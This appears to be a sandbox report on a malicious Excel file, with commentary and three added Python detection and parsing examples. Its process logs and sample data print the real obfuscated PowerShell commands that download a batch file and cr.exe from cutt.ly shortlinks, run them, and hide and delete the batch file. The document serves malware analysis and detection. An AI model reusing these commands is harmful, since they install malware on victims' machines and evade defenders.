Source: C:\Windows\System32\cmd.exe Console Write: ..$......................................................................^Q.....r.e.g............D$...............$.....T....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................\Q........J.............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................). ......................................\Q........J.............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .................................................D$......................\Q.....x................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................................`{.J....................i^Q......$.J..............$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................".6...1.". .=.=. .".6...2.". ............\Q.....i.f. ............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................(................D$.............................x...............d1.......".v...............................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................\Q.....(................D$.............X............................... Jump to behavior
The console-write buffers below were captured as UTF-16 and rendered with one dot per non-printable byte; only the readable text is kept here, in the original order, each fragment in square brackets, and entries with no readable text are marked as such.
Source: C:\Windows\System32\cmd.exe Console Write: [echo] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [ "Windows 8 detected" ] [echo] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [no readable text] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [reg] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [reg] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [1>] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [nul ] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [timeout] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [ /t 2 ] [time] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [1>] [ /t ] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [nul ] [ /t ] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [no readable text] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [schtasks] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [scht] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [1>] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [nul ] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [timeout] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [) ] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [no readable text] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [if ] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ["6.1" == "6.1" ] [if ] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [Cmd] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [Cmd] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [) ] Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: [The batch file cannot be found] Jump to behavior
Taken together these are the commands of pd.bat being echoed as cmd.exe runs it (see the cmd.exe /c ''C:\Users\user\Documents\pd.bat'' entry in the process list): an already-expanded version check if "6.1" == "6.1", an echo of "Windows 8 detected", reg and schtasks invocations whose arguments were not recovered, output redirected with 1>nul, timeout /t 2 delays, and finally "The batch file cannot be found", which is cmd.exe's own message when a batch file disappears while it is still being read and is consistent with the Remove-Item -Path pd.bat -Force step that runs 12 seconds into the chain. The report does not expose the full batch text.
Source: C:\Users\user\AppData\Roaming\cr.exe Command line argument: nkF 24_2_00466AC0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll (6 identical entries) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp (6 identical entries) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp (6 identical entries) Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts (2 identical entries) Jump to behavior
Source: C:\Users\user\AppData\Roaming\cr.exe File read: C:\Windows\System32\drivers\etc\hosts (2 identical entries) Jump to behavior
Source: ul9kpUwYel.xls Virustotal: Detection: 41%
Source: ul9kpUwYel.xls Metadefender: Detection: 22%
Source: ul9kpUwYel.xls ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
Source: unknown Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Source: unknown Process created: C:\Windows\System32\mode.com mode 18,1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: unknown Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
Source: unknown Process created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat'' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 18,1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe' Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2145478746.0000000002AA0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2164368901.0000000002A50000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2153405530.000000001B420000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2189543252.00000000028F0000.00000002.00000001.sdmp

Data Obfuscation:

Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
Source: unknown Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;' Jump to behavior
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe; Jump to behavior
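The command lines above stack three cheap evasions: cmd.exe caret escapes (powershe^l^l), PowerShell backtick escapes inside bare words (stARt`-slE`Ep, nEw-oB`jecT) and string concatenation to keep the method name out of the command line (('Down'+'loadFile')). A detector that matches on the raw command line misses all three. The following Python script is an added example, not part of the sandbox report or of the malware: it normalises the report's own process-creation entries (copied as constructed sample data, keeping the sandbox's rendering of double quotes as single quotes) and then applies the checks behind the report's Sigma hits, an Office process spawning a shell and PowerShell fetching from a URL shortener. The shortener list and the rule names are assumptions made for the example.

```python
import re
from typing import List, Tuple

# Constructed sample: (parent image, child image, child command line), copied
# from the report's "Process created" lines.  The sandbox renders double quotes
# as single quotes and the sample keeps that rendering.
SAMPLE_EVENTS: List[Tuple[str, str, str]] = [
    ("EXCEL.EXE", "cmd.exe",
     "cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'"),
    ("cmd.exe", "powershell.exe",
     "powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile')"
     ".Invoke('https://cutt.ly/ZjsbPXY','pd.bat')"),
    ("cmd.exe", "cmd.exe",
     "Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile')"
     ".Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\\cr.exe');"
     "Start-Sleep 2; Start-Process $env:appdata\\cr.exe;'"),
    ("powershell.exe", "cr.exe", "'C:\\Users\\user\\AppData\\Roaming\\cr.exe'"),
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Assumed shortener list for the example; cutt.ly is the one seen in the report.
URL_SHORTENERS = {"cutt.ly", "bit.ly", "tinyurl.com", "t.co", "is.gd", "rebrand.ly"}

# ('Down'+'loadFile') or ('DownloadFile'): a parenthesised run of single-quoted
# literals joined by '+', used to keep the method name out of the command line.
_CONCAT = re.compile(r"\(\s*('[^']*'(?:\s*\+\s*'[^']*')*)\s*\)")
_URL = re.compile(r"""https?://([A-Za-z0-9.-]+)[^\s'"),;(]*""")
_DOWNLOAD = re.compile(r"Net\.WebClient\).*?\.(DownloadFile|DownloadString|DownloadData)", re.I)


def _fold_concat(match) -> str:
    return "".join(re.findall(r"'([^']*)'", match.group(1)))


def normalise(cmdline: str) -> str:
    """Undo the escaping tricks so patterns match the command that actually runs.

    1. cmd.exe treats ^ as an escape for the next character (powershe^l^l).
    2. PowerShell treats ` as an escape; inside a bare word it is a no-op
       (stARt`-slE`Ep, nEw-oB`jecT), so dropping every backtick is right for
       matching.  This is lossy for real `n / `t escapes inside double-quoted
       strings, which is fine for a detector but not for execution emulation.
    3. ('Down'+'loadFile') is folded back to DownloadFile.
    """
    s = re.sub(r"\^(.)", r"\1", cmdline)
    s = s.replace("`", "")
    s = _CONCAT.sub(_fold_concat, s)
    return re.sub(r"\s+", " ", s).strip()


def analyse(events: List[Tuple[str, str, str]]) -> List[Tuple[str, str]]:
    """Return (rule, detail) findings for a list of process-creation events."""
    findings: List[Tuple[str, str]] = []
    for parent, child, cmdline in events:
        norm = normalise(cmdline)
        if parent.lower() in OFFICE_APPS and child.lower() in SHELLS:
            findings.append(("office_spawns_shell", f"{parent} -> {child}"))
        tricks = cmdline.count("^") + cmdline.count("`") + len(_CONCAT.findall(cmdline))
        if tricks:
            findings.append(("obfuscated_command_line", f"{tricks} escapes/concats: {norm[:70]}"))
        if _DOWNLOAD.search(norm):
            findings.append(("powershell_download", norm[:70]))
            if re.search(r"\bStart-Process\b", norm, re.I):
                findings.append(("download_and_execute", norm[:70]))
        for m in _URL.finditer(norm):
            if m.group(1).lower() in URL_SHORTENERS:
                findings.append(("url_shortener_in_command_line", m.group(0)))
    return findings


if __name__ == "__main__":
    for rule, detail in analyse(SAMPLE_EVENTS):
        print(f"{rule:30} {detail}")
```

Feed real EDR or Sysmon event ID 1 records into analyse() as (ParentImage, Image, CommandLine) triples; the normalised form, not the raw command line, is what the URL and DownloadFile patterns should be evaluated against, and the extracted URLs keep their original case so the shortlink path survives as an indicator.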
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 24_2_00423778
PE file contains sections with non-standard names
Source: sqlite3.dll.24.dr Static PE information: section name: /4
Source: sqlite3.dll.24.dr Static PE information: section name: /19
Source: sqlite3.dll.24.dr Static PE information: section name: /31
Source: sqlite3.dll.24.dr Static PE information: section name: /45
Source: sqlite3.dll.24.dr Static PE information: section name: /57
Source: sqlite3.dll.24.dr Static PE information: section name: /70
Source: sqlite3.dll.24.dr Static PE information: section name: /81
Source: sqlite3.dll.24.dr Static PE information: section name: /92
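Section names of the form /N are not arbitrary. In COFF, a section name longer than 8 bytes is stored as a slash followed by a decimal offset into the string table that sits right after the symbol table, and GNU binutils writes .debug_* and similar long names this way, so a GCC or MinGW build of sqlite3.dll shows exactly these names. Once the symbol table pointer has been zeroed by stripping, the long names can no longer be resolved and appear as /4, /19 and so on, which is what the signature above flags; on its own it indicates a GNU toolchain, not packing. The following Python parser is an added example, not part of the report: it builds a constructed minimal PE image (assumed names .text and .debug_info) and resolves /N names through the string table, returning None when the table is absent.

```python
import struct
from typing import List, Optional, Tuple


def build_sample_pe(strip_symbols: bool = False) -> bytes:
    """Constructed minimal PE/COFF image: DOS stub, PE signature, COFF header,
    two section headers (.text and a long-named one stored as /4) and an empty
    symbol table followed by the COFF string table.  With strip_symbols the
    symbol table pointer is zero and the string table is omitted, as in a
    stripped release build.  The image is not loadable; it only exercises the
    header layout."""
    strings = b".debug_info\0"
    string_table = struct.pack("<I", 4 + len(strings)) + strings   # size field counts itself
    names = [b".text".ljust(8, b"\0"), b"/4".ljust(8, b"\0")]        # "/4": offset 4 in the string table
    section_table = b"".join(n + b"\0" * 32 for n in names)         # 40-byte IMAGE_SECTION_HEADERs, rest zero
    pe_offset = 0x40
    symbol_table_ptr = 0 if strip_symbols else pe_offset + 4 + 20 + len(section_table)
    coff = struct.pack("<HHIIIHH", 0x14C, len(names), 0, symbol_table_ptr, 0, 0, 0x2102)
    dos_header = b"MZ" + b"\0" * 58 + struct.pack("<I", pe_offset)   # e_lfanew lives at 0x3C
    image = dos_header + b"PE\0\0" + coff + section_table
    return image if strip_symbols else image + string_table


def section_names(pe: bytes) -> List[Tuple[str, Optional[str]]]:
    """Return (raw name, resolved name) per section.  A raw name /N is an
    offset into the COFF string table, which follows the 18-byte symbol
    records; if PointerToSymbolTable is 0 the long name cannot be recovered
    and resolved is None."""
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    _machine, nsections, _ts, symptr, nsyms, optsize, _chars = struct.unpack_from("<HHIIIHH", pe, coff)
    string_table = symptr + nsyms * 18 if symptr else None
    first_section = coff + 20 + optsize
    out: List[Tuple[str, Optional[str]]] = []
    for k in range(nsections):
        start = first_section + 40 * k
        raw = pe[start:start + 8].rstrip(b"\0").decode("ascii", "replace")
        resolved: Optional[str] = raw
        if raw.startswith("/") and raw[1:].isdigit():
            if string_table is None:
                resolved = None
            else:
                off = string_table + int(raw[1:])
                resolved = pe[off:pe.index(b"\0", off)].decode("ascii", "replace")
        out.append((raw, resolved))
    return out


if __name__ == "__main__":
    for raw, resolved in section_names(build_sample_pe()):
        print(f"{raw:8} -> {resolved}")
    for raw, resolved in section_names(build_sample_pe(strip_symbols=True)):
        print(f"{raw:8} -> {resolved}")
```

Run section_names() over the bytes of a dropped DLL before treating /N names as an obfuscation indicator: resolved .debug_* or .gnu_debuglink names, or unresolvable names together with a zero symbol table pointer, point to a stripped GNU build rather than a packer.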
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00467460 push eax; ret 24_2_0046747E
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004674C1 push eax; ret 24_2_004674B6
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00467480 push eax; ret 24_2_004674B6
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043FA71 push ecx; ret 24_2_0043FA84
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043FC66 push ecx; ret 24_2_0043FC79
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0046FED8 pushad ; retf 0046h 24_2_0046FEE1
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00222AA1 push es; retf 24_2_00222AA5
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0022502A push esi; ret 24_2_0022502E
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00223605 push 00000004h; iretd 24_2_0022360C
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00223E89 push eax; retf 24_2_00223E8A
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002D76B0 push eax; ret 24_2_002D76CE
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002D76D0 push eax; ret 24_2_002D7706
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002AFCC1 push ecx; ret 24_2_002AFCD4
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_047F350A push ss; iretd 24_2_047F3624
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_047F312B push ss; ret 24_2_047F3135
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
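The pairs above are what the sandbox's push/ret signature looks for: a push followed immediately by a ret-family instruction turns the pushed value into an indirect jump target, which defeats simple call and jmp cross-references in a disassembler. Two caveats apply before weighting this finding. The push ecx; ret pairs at 0x0043FA71 and 0x0043FC66 match the tail of the MSVC C runtime's SEH epilog helpers (_SEH_epilog4), a routine false positive in any statically linked CRT, and hits such as push ss; iretd or push es; retf in the 0x0022xxxx and 0x047Fxxxx ranges are typically data or padding being read as code. The scanner below is an added example, not code from the report; it performs the same linear raw-byte scan and so shares that weakness. The byte buffer is constructed to encode the pairs the report lists for cr.exe, and the base address 0x00467460 is taken from the report only so the output resembles it.

```python
from typing import Dict, List, Tuple

X86_REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
# Single-byte PUSH encodings.  Assumption for this example: no prefixes,
# no ModR/M forms (FF /6) and no 16-bit operand size.
PUSH_OPS: Dict[int, str] = {0x50 + i: f"push {r}" for i, r in enumerate(X86_REGS)}
PUSH_OPS.update({0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds", 0x60: "pushad"})
PUSH_IMM = {0x6A: 1, 0x68: 4}                      # push imm8 / push imm32
RET_OPS = {0xC3: ("ret", 0), 0xC2: ("ret", 2),     # opcode -> (mnemonic, immediate size)
           0xCB: ("retf", 0), 0xCA: ("retf", 2), 0xCF: ("iretd", 0)}


def find_push_ret(code: bytes, base: int = 0) -> List[Tuple[int, str]]:
    """Linear raw-byte scan for a PUSH immediately followed by a RET-family
    instruction; returns (address, text) pairs.  Like the sandbox signature it
    does not follow control flow, so a hit can land on bytes that are never
    executed as such."""
    hits: List[Tuple[int, str]] = []
    n = len(code)
    for i in range(n):
        op = code[i]
        if op in PUSH_OPS:
            push_len, push_txt = 1, PUSH_OPS[op]
        elif op in PUSH_IMM and i + 1 + PUSH_IMM[op] <= n:
            size = PUSH_IMM[op]
            imm = int.from_bytes(code[i + 1:i + 1 + size], "little", signed=True)
            push_len, push_txt = 1 + size, f"push {imm & 0xFFFFFFFF:08X}h"   # imm8 is sign-extended
        else:
            continue
        j = i + push_len
        if j >= n or code[j] not in RET_OPS:
            continue
        name, isz = RET_OPS[code[j]]
        if j + 1 + isz > n:
            continue
        if isz:
            imm = int.from_bytes(code[j + 1:j + 1 + isz], "little")
            hits.append((base + i, f"{push_txt}; {name} {imm:04X}h"))
        else:
            hits.append((base + i, f"{push_txt}; {name}"))
    return hits


# Constructed sample bytes encoding the pairs the report lists for cr.exe,
# padded with an ordinary prologue and NOPs.
SAMPLE_CODE = (
    b"\x55\x8B\xEC"           # push ebp; mov ebp, esp   (no hit: push not followed by ret)
    + b"\x50\xC3"             # push eax; ret
    + b"\x90\x90\x90"         # nop padding
    + b"\x60\xCA\x46\x00"     # pushad; retf 0046h
    + b"\x6A\x04\xCF"         # push 00000004h; iretd
    + b"\x06\xCB"             # push es; retf
    + b"\x16\xCF"             # push ss; iretd
    + b"\x51\xC3"             # push ecx; ret
)

if __name__ == "__main__":
    for addr, text in find_push_ret(SAMPLE_CODE, base=0x00467460):
        print(f"{addr:08X}  {text}")
```

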